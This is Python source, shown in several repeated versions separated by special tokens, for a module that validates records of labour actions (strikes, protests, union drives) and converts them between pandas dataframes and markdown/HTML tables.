<|reserved_special_token_0|>
@classmethod
def create_from_row(cls, row: pd.Series) ->'Action':
""" Create an Action instance from a dataframe row. """
fields = [key for key, value in cls.__dataclass_fields__.items() if
value.type != ClassVar]
d = {key: value for key, value in row.to_dict().items() if key in
fields}
return cls(**d)
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used for the four primary
use cases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
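# Editor's note: an illustrative sketch, not part of the original module.
# to_df() emits one row per action, flattening lists to comma-separated
# strings via render_df(); read_from_df() rebuilds each Action with
# Action.create_from_row(), whose __post_init__ re-listifies those strings.
def _df_round_trip(actions: 'Actions') ->'Actions':
    df = actions.to_df()
    return Actions.read_from_df(df)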
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Url = str
@dataclass
class Action:
""" The class for an action we want to track.
This class is used to manage the data of an individual Action. It is used
to perform the following:
- set mandatory/optional fields
- set meta fields
- cast and validate data so that it knows how to read data fields from
markdown and dataframes
- output actions as dataframes and markdown
- create and populate action instances from markdown and dataframes
"""
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ['author']
_valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',
'working_conditions', 'discrimination', 'unfair_labor_practices',
'job_security']
_valid_actions: ClassVar = ['strike', 'protest', 'open_letter',
'legal_action', 'union_drive', 'union_representation']
@staticmethod
def is_none(field: Any) ->bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == 'none':
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
def listify(self, field: Union[List[Any], Any]) ->List[Any]:
if self.is_none(field):
return None
elif isinstance(field, (list,)):
return field
else:
return [s.strip().lower() for s in field.split(',')]
def __post_init__(self):
""" Used to validate fields. """
self.date = dateparser.parse(self.date).date()
self.sources = self.listify(self.sources)
self.struggles = self.listify(self.struggles)
self.action = self.action.strip().lower()
self.companies = self.listify(self.companies)
self.tags = self.listify(self.tags)
self.locations = self.listify(self.locations)
self.workers = None if self.is_none(self.workers) else int(self.workers
)
assert self.action in self._valid_actions, f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
for struggle in self.struggles:
assert struggle in self._valid_struggles, f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
for source in self.sources:
assert BeautifulSoup(source, 'html.parser'
).a is not None or urlparse(source
).netloc != '', f"'{source}' is invalid. source must be a valid url or an html link tag element"
self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if
'href' in source else source) for source in self.sources]
def __lt__(self, other):
""" Used to make Actions sortable. """
return self.date < other.date
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Action):
return self.__dict__.items() == other.__dict__.items()
return False
def to_df(self) ->Dict[str, Any]:
""" Return dict of all fields serialized to string """
return {key: self.render_df(key) for key, value in self.__dict__.
items()}
def render_df(self, field: str) ->str:
""" Return the value of the field rendered for df. """
value = self.__getattribute__(field)
if field in ['date', 'workers']:
return str(value)
elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'
]:
return str(value).strip('[').strip(']').replace("'", '').replace(
'"', '')
else:
return value
def to_md(self, field: str, td: bs4.element.Tag) ->str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'
value = self.__getattribute__(field)
if field in ['date', 'workers']:
td.string = str(value)
elif field in ['locations', 'struggles', 'companies', 'tags']:
td.string = str(value).strip('[').strip(']').replace("'", ''
).replace('"', '')
elif field == 'sources':
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(', '.join(ret)),
'html.parser'))
else:
td.string = value
return td
@classmethod
def create_from_md(cls, table: bs4.element.Tag) ->'Action':
""" Create an Action instance from a md table. """
a = {}
trs = table.find_all('tr')
for key, val in table.attrs.items():
if key != 'class':
a[key] = val
for i, tr in enumerate(trs):
td_key = tr.find('td', class_='field-key')
td_val = tr.find('td', class_='field-value')
val = ''.join(str(e) for e in td_val.contents).strip()
key = ''.join(str(e) for e in td_key.contents).strip()
a[key] = val
return cls(**a)
@classmethod
def create_from_row(cls, row: pd.Series) ->'Action':
""" Create an Action instance from a dataframe row. """
fields = [key for key, value in cls.__dataclass_fields__.items() if
value.type != ClassVar]
d = {key: value for key, value in row.to_dict().items() if key in
fields}
return cls(**d)
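# Editor's note: an illustrative sketch, not part of the original module,
# showing how __post_init__ normalises raw inputs: the free-form date is
# parsed by dateparser, the comma-separated struggles string is split into
# a list, and workers is cast to int. All field values are hypothetical.
def _normalisation_demo() ->'Action':
    a = Action(date='15 January 2020', sources=['https://example.com/news/1'],
        action='strike', struggles='pay_and_benefits, job_security',
        description='hypothetical sample action', workers='250')
    assert a.struggles == ['pay_and_benefits', 'job_security']
    assert a.workers == 250
    return a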
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used for the four primary
use cases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = 'actions'
actions: List[Action] = field(default_factory=lambda : [])
fields: List[str] = field(default_factory=lambda : [key for key, value in
Action.__dataclass_fields__.items() if value.type != ClassVar])
def __len__(self) ->int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) ->'Actions':
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) ->pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient='list')
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')
for action in self.actions:
table = soup.new_tag('table')
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag('tr')
td_key = soup.new_tag('td', attrs={'class': 'field-key'})
td_val = soup.new_tag('td', attrs={'class': 'field-value'})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(f'<div id="{cls.action_id}">+[\\s\\S]+<\\/div>',
md_doc)
assert len(md_data
) == 1, f'multiple divs with id={cls.action_id} were found'
md_data = md_data[0]
soup = BeautifulSoup(md_data, 'html.parser')
tables = soup.div.find_all('table')
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) ->'Actions':
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
<|reserved_special_token_1|>
import pandas as pd
import math
import json
import html
import bs4
import re
import dateparser
from bs4 import BeautifulSoup
from dataclasses import dataclass, field
from datetime import datetime
from typing import Any, List, Dict, ClassVar, Union
from urllib.parse import urlparse
from .markdown import MarkdownData, MarkdownDocument
Url = str
@dataclass
class Action:
""" The class for an action we want to track.
This class is used to manage the data of an individual Action. It is used
to perform the following:
- set mandatory/optional fields
- set meta fields
- cast and validate data so that it knows how to read data fields from
markdown and dataframes
- output actions as dataframes and markdown
- create and populate action instances from markdown and dataframes
"""
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ["author"]
_valid_struggles: ClassVar = [
"ethics",
"pay_and_benefits",
"working_conditions",
"discrimination",
"unfair_labor_practices",
"job_security",
]
_valid_actions: ClassVar = [
"strike",
"protest",
"open_letter",
"legal_action",
"union_drive",
"union_representation",
]
@staticmethod
def is_none(field: Any) -> bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == "none":
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
def listify(self, field: Union[List[Any], Any]) -> List[Any]:
if self.is_none(field):
return None
else:
if isinstance(field, (list,)):
return field
else:
return [s.strip().lower() for s in field.split(",")]
def __post_init__(self):
""" Used to validate fields. """
# self.date = datetime.strptime(self.date, "%Y-%m-%d").date()
self.date = dateparser.parse(self.date).date()
self.sources = self.listify(self.sources)
self.struggles = self.listify(self.struggles)
self.action = self.action.strip().lower()
self.companies = self.listify(self.companies)
self.tags = self.listify(self.tags)
self.locations = self.listify(self.locations)
self.workers = None if self.is_none(self.workers) else int(self.workers)
# make sure action is a valid action
assert (
self.action in self._valid_actions
), f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
# make sure all struggles are valid struggles
for struggle in self.struggles:
assert (
struggle in self._valid_struggles
), f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
# make sure source is either a url or a html link tag <a>
for source in self.sources:
assert (
BeautifulSoup(source, "html.parser").a is not None
or urlparse(source).netloc is not ""
), f"'{source}' is in valid. source must be a valid url or an html link tag element"
# if html, extract only href from sources
self.sources = [
BeautifulSoup(source, "html.parser").a["href"]
if "href" in source
else source
for source in self.sources
]
def __lt__(self, other):
""" Used to make Actions sortable. """
return self.date < other.date
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Action):
return self.__dict__.items() == other.__dict__.items()
return False
def to_df(self) -> Dict[str, Any]:
""" Return dict of all fields serialized to string """
return {key: self.render_df(key) for key, value in self.__dict__.items()}
def render_df(self, field: str) -> str:
""" Return the value of the field rendered for df. """
value = self.__getattribute__(field)
if field in ["date", "workers"]:
return str(value)
elif field in ["locations", "struggles", "companies", "tags", "sources"]:
return str(value).strip("[").strip("]").replace("'", "").replace('"', "")
else:
return value
def to_md(self, field: str, td: bs4.element.Tag) -> str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert (
field in self.__dataclass_fields__
), f"Cannot serialize {field}. Not a valid field in Action."
value = self.__getattribute__(field)
if field in ["date", "workers"]:
td.string = str(value)
elif field in ["locations", "struggles", "companies", "tags"]:
td.string = (
str(value).strip("[").strip("]").replace("'", "").replace('"', "")
)
elif field == "sources":
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(", ".join(ret)), "html.parser"))
else:
td.string = value
return td
@classmethod
def create_from_md(cls, table: bs4.element.Tag) -> "Action":
""" Create an Action instance from a md table. """
a = {}
trs = table.find_all("tr")
for key, val in table.attrs.items():
if key != "class":
a[key] = val
for i, tr in enumerate(trs):
td_key = tr.find("td", class_="field-key")
td_val = tr.find("td", class_="field-value")
val = "".join(str(e) for e in td_val.contents).strip()
key = "".join(str(e) for e in td_key.contents).strip()
a[key] = val
return cls(**a)
@classmethod
def create_from_row(cls, row: pd.Series) -> "Action":
""" Create an Action instance from a dataframe row. """
fields = [
key
for key, value in cls.__dataclass_fields__.items()
if value.type != ClassVar
]
d = {key: value for key, value in row.to_dict().items() if key in fields}
return cls(**d)
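# Editor's note: an illustrative sketch, not part of the original module,
# showing create_from_row(). Only declared (non-ClassVar) dataclass fields
# survive the filter, so extra dataframe columns are dropped silently. The
# row values are hypothetical sample data.
def _from_row_demo() -> "Action":
    row = pd.Series(
        {
            "date": "2020-01-15",
            "sources": "https://example.com/a",
            "action": "open_letter",
            "struggles": "ethics",
            "description": "hypothetical sample action",
            "extra_column": "dropped by create_from_row",
        }
    )
    return Action.create_from_row(row)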
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used for the four primary
use cases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = "actions"
actions: List[Action] = field(default_factory=lambda: [])
fields: List[str] = field(
default_factory=lambda: [
key
for key, value in Action.__dataclass_fields__.items()
if value.type != ClassVar
]
)
def __len__(self) -> int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) -> "Actions":
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) -> pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient="list")
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f"<div id={self.action_id}></div>", "html.parser")
for action in self.actions:
table = soup.new_tag("table")
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag("tr")
td_key = soup.new_tag("td", attrs={"class": "field-key"})
td_val = soup.new_tag("td", attrs={"class": "field-value"})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) -> "Actions":
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(fr'<div id="{cls.action_id}">+[\s\S]+<\/div>', md_doc)
assert len(md_data) == 1, f"multiple divs with id={cls.action_id} were found"
md_data = md_data[0]
soup = BeautifulSoup(md_data, "html.parser")
tables = soup.div.find_all("table")
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) -> "Actions":
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
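# Editor's note: an illustrative end-to-end sketch, not part of the original
# module. It builds a small collection from hypothetical sample data, renders
# it to markdown/HTML, and parses it back.
if __name__ == "__main__":
    sample = Actions()
    sample.append(
        Action(
            date="2020-01-15",
            sources=["https://example.com/a"],
            action="strike",
            struggles="pay_and_benefits",
            description="hypothetical sample action",
        )
    )
    md = sample.to_md()
    parsed = Actions.read_from_md(md)
    print(f"parsed {len(parsed)} action(s) back from markdown")
    print(sample.to_df())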
|
flexible
|
{
"blob_id": "4d0f612c74dc175766f489580fc4a492e1bfd085",
"index": 4345,
"step-1": "<mask token>\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-2": "<mask token>\n\n\n@dataclass\nclass Action:\n <mask token>\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n _meta_fields: ClassVar = ['author']\n _valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',\n 'working_conditions', 'discrimination', 'unfair_labor_practices',\n 'job_security']\n _valid_actions: ClassVar = ['strike', 'protest', 'open_letter',\n 'legal_action', 'union_drive', 'union_representation']\n\n @staticmethod\n def is_none(field: Any) ->bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == 'none':\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def to_md(self, field: str, td: bs4.element.Tag) ->str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n td.string = str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags']:\n td.string = str(value).strip('[').strip(']').replace(\"'\", ''\n ).replace('\"', '')\n elif field == 'sources':\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(', '.join(ret)),\n 'html.parser'))\n else:\n td.string = value\n return td\n <mask token>\n <mask token>\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. 
\"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-3": "<mask token>\n\n\n@dataclass\nclass Action:\n <mask token>\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n _meta_fields: ClassVar = ['author']\n _valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',\n 'working_conditions', 'discrimination', 'unfair_labor_practices',\n 'job_security']\n _valid_actions: ClassVar = ['strike', 'protest', 'open_letter',\n 'legal_action', 'union_drive', 'union_representation']\n\n @staticmethod\n def is_none(field: Any) ->bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == 'none':\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n <mask token>\n\n def __post_init__(self):\n \"\"\" Used to validate fields. \"\"\"\n self.date = dateparser.parse(self.date).date()\n self.sources = self.listify(self.sources)\n self.struggles = self.listify(self.struggles)\n self.action = self.action.strip().lower()\n self.companies = self.listify(self.companies)\n self.tags = self.listify(self.tags)\n self.locations = self.listify(self.locations)\n self.workers = None if self.is_none(self.workers) else int(self.workers\n )\n assert self.action in self._valid_actions, f\"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}\"\n for struggle in self.struggles:\n assert struggle in self._valid_struggles, f\"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}\"\n for source in self.sources:\n assert BeautifulSoup(source, 'html.parser'\n ).a is not None or urlparse(source\n ).netloc is not '', f\"'{source}' is in valid. source must be a valid url or an html link tag element\"\n self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if \n 'href' in source else source) for source in self.sources]\n\n def __lt__(self, other):\n \"\"\" Used to make Actions sortable. \"\"\"\n return self.date < other.date\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Action):\n return self.__dict__.items() == other.__dict__.items()\n return False\n\n def to_df(self) ->Dict[str, Any]:\n \"\"\" Return dict of all fields serialized to string \"\"\"\n return {key: self.render_df(key) for key, value in self.__dict__.\n items()}\n\n def render_df(self, field: str) ->str:\n \"\"\" Return the value of the field rendered for df. \"\"\"\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n return str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'\n ]:\n return str(value).strip('[').strip(']').replace(\"'\", '').replace(\n '\"', '')\n else:\n return value\n\n def to_md(self, field: str, td: bs4.element.Tag) ->str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert field in self.__dataclass_fields__, f'Cannot serialize {field}. 
Not a valid field in Action.'\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n td.string = str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags']:\n td.string = str(value).strip('[').strip(']').replace(\"'\", ''\n ).replace('\"', '')\n elif field == 'sources':\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(', '.join(ret)),\n 'html.parser'))\n else:\n td.string = value\n return td\n <mask token>\n\n @classmethod\n def create_from_row(cls, row: pd.Series) ->'Action':\n \"\"\" Create an Action instance from a dataframe row. \"\"\"\n fields = [key for key, value in cls.__dataclass_fields__.items() if\n value.type != ClassVar]\n d = {key: value for key, value in row.to_dict().items() if key in\n fields}\n return cls(**d)\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. 
